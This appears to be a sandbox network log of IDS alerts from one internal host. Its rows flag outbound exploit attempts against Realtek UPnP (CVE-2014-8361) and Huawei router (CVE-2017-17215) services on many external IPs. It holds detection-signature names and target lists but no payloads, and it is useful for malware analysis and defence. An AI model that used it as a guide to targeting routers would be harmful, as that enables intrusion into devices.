                                                07/20/24-23:06:01.862638TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24072052869192.168.2.14165.147.124.56
                                                07/20/24-23:05:40.430092TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3814252869192.168.2.14108.93.153.171
                                                07/20/24-23:06:15.183242TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613632452869192.168.2.1435.17.252.36
                                                07/20/24-23:08:18.360344TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5280052869192.168.2.14124.220.109.211
                                                07/20/24-23:06:14.441698TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613974252869192.168.2.14194.12.165.29
                                                07/20/24-23:05:57.584377TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5746252869192.168.2.14218.181.218.187
                                                07/20/24-23:05:59.221858TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614229052869192.168.2.1486.230.221.175
                                                07/20/24-23:05:48.777005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5546037215192.168.2.14157.8.17.200
                                                07/20/24-23:05:59.106701TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615128052869192.168.2.1471.121.141.254
                                                07/20/24-23:05:59.840145TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5304252869192.168.2.1423.110.47.132
                                                07/20/24-23:06:12.531607TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3461652869192.168.2.14180.166.158.232
                                                07/20/24-23:05:59.727506TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5834652869192.168.2.14147.97.158.170
                                                07/20/24-23:06:01.691705TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25167652869192.168.2.14138.239.248.75
                                                07/20/24-23:05:37.446803TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24797052869192.168.2.14141.0.4.62
                                                07/20/24-23:06:01.467144TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5940852869192.168.2.14137.159.98.94
                                                07/20/24-23:05:39.336567TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615343652869192.168.2.14208.42.152.137
                                                07/20/24-23:05:57.141104TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5391052869192.168.2.14213.67.142.255
                                                07/20/24-23:06:45.817352TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5304652869192.168.2.14167.208.176.195
                                                07/20/24-23:06:00.417227TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3478852869192.168.2.14114.51.118.233
                                                07/20/24-23:05:52.537891TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3831252869192.168.2.14191.198.16.14
                                                07/20/24-23:05:57.186864TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613283252869192.168.2.1448.66.197.202
                                                07/20/24-23:05:34.627949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3495837215192.168.2.14157.201.151.163
                                                07/20/24-23:06:02.018794TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24612052869192.168.2.1480.193.144.183
                                                07/20/24-23:05:39.642815TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4742052869192.168.2.1417.225.60.69
                                                07/20/24-23:06:32.390708TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26075252869192.168.2.14121.110.33.111
                                                07/20/24-23:05:34.622609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5495037215192.168.2.1441.65.214.53
                                                07/20/24-23:05:52.472912TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24879852869192.168.2.14161.118.217.155
                                                07/20/24-23:06:27.853068TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23406052869192.168.2.145.117.210.100
                                                07/20/24-23:05:44.320022TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3867852869192.168.2.14190.251.113.36
                                                07/20/24-23:06:01.482595TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25922452869192.168.2.1449.116.114.195
                                                07/20/24-23:06:13.676865TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23306252869192.168.2.1425.111.49.43
                                                07/20/24-23:05:46.718788TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5368852869192.168.2.1460.4.213.153
                                                07/20/24-23:06:03.435630TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4309652869192.168.2.14169.254.99.226
                                                07/20/24-23:06:04.880694TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6017252869192.168.2.14114.138.107.32
                                                07/20/24-23:06:08.171917TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615924052869192.168.2.14192.204.183.84
                                                07/20/24-23:05:55.877930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3884637215192.168.2.14197.203.124.67
                                                07/20/24-23:05:56.941781TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615872852869192.168.2.14170.235.254.81
                                                07/20/24-23:07:03.123324TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614842852869192.168.2.148.154.253.124
                                                07/20/24-23:05:57.944258TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5479652869192.168.2.14108.132.143.152
                                                07/20/24-23:05:37.648285TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3791652869192.168.2.14172.51.35.214
                                                07/20/24-23:05:38.476346TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614164652869192.168.2.1436.106.161.161
                                                07/20/24-23:06:38.736451TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4067052869192.168.2.1467.89.77.75
                                                07/20/24-23:05:39.047547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3885837215192.168.2.14157.161.23.127
                                                07/20/24-23:05:44.686584TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4535852869192.168.2.1459.125.137.153
                                                07/20/24-23:05:46.305924TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614921052869192.168.2.14219.121.248.52
                                                07/20/24-23:05:33.831807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3381637215192.168.2.14157.55.227.62
                                                07/20/24-23:05:39.047734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5682637215192.168.2.14197.71.84.187
                                                07/20/24-23:05:40.348099TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24758252869192.168.2.14103.130.0.226
                                                07/20/24-23:05:57.544144TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4243852869192.168.2.14133.93.209.42
                                                07/20/24-23:06:12.663367TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5886052869192.168.2.1427.172.117.243
                                                07/20/24-23:05:59.096689TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614062652869192.168.2.14195.118.211.22
                                                07/20/24-23:06:01.763636TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23852452869192.168.2.1453.49.234.47
                                                07/20/24-23:06:56.793781TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614248652869192.168.2.1420.37.182.77
                                                07/20/24-23:06:11.420819TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5517252869192.168.2.1475.115.110.52
                                                07/20/24-23:05:46.780012TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5790052869192.168.2.1434.65.144.238
                                                07/20/24-23:06:16.718290TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613694452869192.168.2.1496.167.164.193
                                                07/20/24-23:05:37.455022TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3966052869192.168.2.149.71.131.31
                                                07/20/24-23:05:59.119232TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5690052869192.168.2.1453.153.197.182
                                                07/20/24-23:05:46.302433TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614231252869192.168.2.14132.178.41.100
                                                07/20/24-23:05:56.056582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4970837215192.168.2.14171.54.94.232
                                                07/20/24-23:05:57.624711TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615633452869192.168.2.14154.170.187.222
                                                07/20/24-23:05:45.563600TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613413452869192.168.2.14141.254.197.56
                                                07/20/24-23:05:40.333807TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3335652869192.168.2.1486.88.84.85
                                                07/20/24-23:05:33.835674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3829637215192.168.2.14157.170.165.170
                                                07/20/24-23:06:03.672694TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24476452869192.168.2.14193.17.40.179
                                                07/20/24-23:05:37.459218TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23985252869192.168.2.14134.42.80.231
                                                07/20/24-23:05:40.435340TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24370252869192.168.2.1473.20.147.180
                                                07/20/24-23:05:56.159948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4988837215192.168.2.14104.139.119.135
                                                07/20/24-23:05:59.954496TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4542052869192.168.2.14169.204.117.167
                                                07/20/24-23:05:47.704882TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5467252869192.168.2.14161.253.199.89
                                                07/20/24-23:05:50.571555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4515237215192.168.2.14197.89.124.156
                                                07/20/24-23:06:00.607400TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24055252869192.168.2.14189.67.163.117
                                                07/20/24-23:05:34.627062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4834637215192.168.2.14197.47.165.186
                                                07/20/24-23:05:45.409134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3473037215192.168.2.1441.235.155.97
                                                07/20/24-23:05:56.243447TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3885252869192.168.2.14159.241.80.83
                                                07/20/24-23:05:57.357839TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5673452869192.168.2.14103.108.73.218
                                                07/20/24-23:05:37.462705TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5613652869192.168.2.1457.144.122.58
                                                07/20/24-23:06:00.177523TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5902652869192.168.2.14101.76.199.86
                                                07/20/24-23:05:36.265249TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616027252869192.168.2.14106.240.191.91
                                                07/20/24-23:05:46.354200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5657852869192.168.2.1418.33.95.3
                                                07/20/24-23:05:36.241970TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5677852869192.168.2.1478.129.211.10
                                                07/20/24-23:06:29.347952TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5300652869192.168.2.14203.91.112.188
                                                07/20/24-23:05:34.657123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5550437215192.168.2.1490.121.157.161
                                                07/20/24-23:05:40.392392TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25051652869192.168.2.1460.68.102.220
                                                07/20/24-23:05:57.533213TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4175852869192.168.2.14133.93.209.42
                                                07/20/24-23:05:58.834336TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25311252869192.168.2.1432.213.80.182
                                                07/20/24-23:06:01.183172TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614140252869192.168.2.1466.55.188.148
                                                07/20/24-23:06:05.614115TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5852652869192.168.2.14177.203.93.50
                                                07/20/24-23:05:56.967255TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4983452869192.168.2.14160.184.86.98
                                                07/20/24-23:05:48.082891TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3411652869192.168.2.14196.43.133.244
                                                07/20/24-23:05:58.195412TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4779052869192.168.2.1434.148.232.132
                                                07/20/24-23:05:57.830942TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4443052869192.168.2.14198.213.67.23
                                                07/20/24-23:06:16.186287TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614706252869192.168.2.14102.178.124.219
                                                07/20/24-23:05:40.490071TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5786852869192.168.2.1427.212.16.98
                                                07/20/24-23:05:59.262794TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3656852869192.168.2.14223.25.114.136
                                                07/20/24-23:06:24.686159TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5066852869192.168.2.14132.80.204.166
                                                07/20/24-23:05:57.194696TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3488652869192.168.2.14173.6.68.101
                                                07/20/24-23:05:52.594252TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4993252869192.168.2.1471.131.126.141
                                                07/20/24-23:06:02.474846TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3364852869192.168.2.14143.208.19.25
                                                07/20/24-23:05:57.011285TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4068452869192.168.2.1423.45.171.168
                                                07/20/24-23:05:57.592012TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613467652869192.168.2.14152.209.55.30
                                                07/20/24-23:05:52.633204TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25639052869192.168.2.14171.64.212.60
                                                07/20/24-23:06:11.351053TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614158452869192.168.2.1481.179.50.162
                                                07/20/24-23:06:01.121675TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3850652869192.168.2.14199.208.79.51
                                                07/20/24-23:06:07.980733TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23280052869192.168.2.1481.215.136.101
                                                07/20/24-23:05:50.571555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5867037215192.168.2.14157.205.246.36
                                                07/20/24-23:05:58.818180TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3623652869192.168.2.1493.193.36.93
                                                07/20/24-23:05:33.833027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4874637215192.168.2.1476.174.76.195
                                                07/20/24-23:05:40.483611TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6045852869192.168.2.1461.50.146.33
                                                07/20/24-23:05:59.727506TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5007452869192.168.2.14172.49.31.94
                                                07/20/24-23:05:58.950772TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3301652869192.168.2.1470.214.171.113
                                                07/20/24-23:06:01.824928TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613386452869192.168.2.1475.226.205.63
                                                07/20/24-23:05:57.034294TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6063652869192.168.2.14179.5.84.190
                                                07/20/24-23:05:35.457080TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3751052869192.168.2.1420.226.134.71
                                                07/20/24-23:05:36.324397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4853437215192.168.2.14157.118.173.130
                                                07/20/24-23:05:39.061893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5358637215192.168.2.1441.165.207.46
                                                07/20/24-23:05:34.657123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5952837215192.168.2.14193.24.185.130
                                                07/20/24-23:06:12.981585TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4366852869192.168.2.14207.229.71.38
                                                07/20/24-23:05:37.524280TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25341252869192.168.2.14190.147.108.124
                                                07/20/24-23:05:58.929504TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5087852869192.168.2.14222.129.233.119
                                                07/20/24-23:06:03.058977TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614248652869192.168.2.14148.124.254.69
                                                07/20/24-23:05:52.468494TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5831252869192.168.2.14120.12.145.48
                                                07/20/24-23:05:36.327720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4297637215192.168.2.1441.240.81.129
                                                07/20/24-23:05:45.383849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3664237215192.168.2.1472.84.218.103
                                                07/20/24-23:05:59.587077TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5195852869192.168.2.14146.113.147.42
                                                07/20/24-23:05:38.179082TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4909652869192.168.2.14159.176.16.130
                                                07/20/24-23:06:20.681117TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4966052869192.168.2.1459.30.21.146
                                                07/20/24-23:05:58.093159TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5786252869192.168.2.14102.49.228.203
                                                07/20/24-23:06:00.257590TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613693852869192.168.2.14147.248.169.35
                                                07/20/24-23:05:33.862992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5249437215192.168.2.14216.204.37.61
                                                07/20/24-23:06:02.925500TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3945852869192.168.2.14146.10.41.251
                                                07/20/24-23:05:40.333807TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23876852869192.168.2.1465.34.121.12
                                                07/20/24-23:05:45.161261TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614742052869192.168.2.1482.30.99.23
                                                07/20/24-23:05:50.533759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3836037215192.168.2.14157.204.24.88
                                                07/20/24-23:06:02.412131TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23576852869192.168.2.1460.48.237.97
                                                07/20/24-23:05:36.339999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5979637215192.168.2.14157.57.125.1
                                                07/20/24-23:06:01.556801TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3588052869192.168.2.14148.117.182.60
                                                07/20/24-23:05:59.266004TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6098852869192.168.2.14143.92.41.114
                                                07/20/24-23:05:56.301028TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613824252869192.168.2.14203.90.117.81
                                                07/20/24-23:06:16.584797TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4904852869192.168.2.1414.90.177.172
                                                07/20/24-23:06:02.297270TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615270852869192.168.2.14211.144.169.11
                                                07/20/24-23:06:14.645434TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614925052869192.168.2.14203.111.124.30
                                                07/20/24-23:06:16.602976TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613589252869192.168.2.14111.251.138.247
                                                07/20/24-23:05:35.533428TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615024252869192.168.2.14185.138.94.75
                                                07/20/24-23:05:59.298825TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24836652869192.168.2.1490.130.53.27
                                                07/20/24-23:05:36.328888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4041637215192.168.2.1441.67.253.194
                                                07/20/24-23:05:37.575243TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4275252869192.168.2.142.163.63.233
                                                07/20/24-23:05:47.120793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3282237215192.168.2.1441.134.4.113
                                                07/20/24-23:06:00.581239TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4064252869192.168.2.14147.107.44.253
                                                07/20/24-23:05:34.648426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5765437215192.168.2.14197.155.87.199
                                                07/20/24-23:05:47.312437TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5199852869192.168.2.1449.158.117.14
                                                07/20/24-23:05:36.061926TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3371452869192.168.2.14170.98.124.78
                                                07/20/24-23:05:39.035942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5691437215192.168.2.14197.224.252.181
                                                07/20/24-23:05:56.036527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5336237215192.168.2.1441.232.63.64
                                                07/20/24-23:06:14.383065TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614373652869192.168.2.14179.212.194.205
                                                07/20/24-23:06:17.683294TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25668052869192.168.2.14183.52.83.104
                                                07/20/24-23:05:50.501247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5340237215192.168.2.1441.244.48.234
                                                07/20/24-23:06:05.344794TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614994652869192.168.2.14182.114.119.16
                                                07/20/24-23:05:33.853184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3617437215192.168.2.14157.58.89.166
                                                07/20/24-23:05:39.463555TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5853052869192.168.2.1432.251.164.213
                                                07/20/24-23:05:39.839035TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3700252869192.168.2.1439.47.233.5
                                                07/20/24-23:05:34.626588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5341437215192.168.2.14157.130.208.54
                                                07/20/24-23:06:12.592127TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3577052869192.168.2.14178.92.19.218
                                                07/20/24-23:05:38.002596TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615010452869192.168.2.144.234.130.62
                                                07/20/24-23:05:57.013302TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5434652869192.168.2.14134.140.38.1
                                                07/20/24-23:05:40.377377TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5111052869192.168.2.1467.38.12.24
                                                07/20/24-23:06:00.224203TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23877852869192.168.2.14145.234.43.35
                                                07/20/24-23:05:52.701555TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3615052869192.168.2.14196.43.133.244
                                                07/20/24-23:06:29.102034TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614613452869192.168.2.1448.217.112.115
                                                07/20/24-23:05:36.598734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3992837215192.168.2.1441.50.50.208
                                                07/20/24-23:05:45.357082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3363037215192.168.2.1412.197.191.86
                                                07/20/24-23:06:11.487097TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615407052869192.168.2.14167.174.248.212
                                                07/20/24-23:06:12.712041TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613623652869192.168.2.1467.162.229.227
                                                07/20/24-23:06:16.252147TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5819652869192.168.2.1412.181.61.163
                                                07/20/24-23:05:35.444430TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616099452869192.168.2.1451.84.22.246
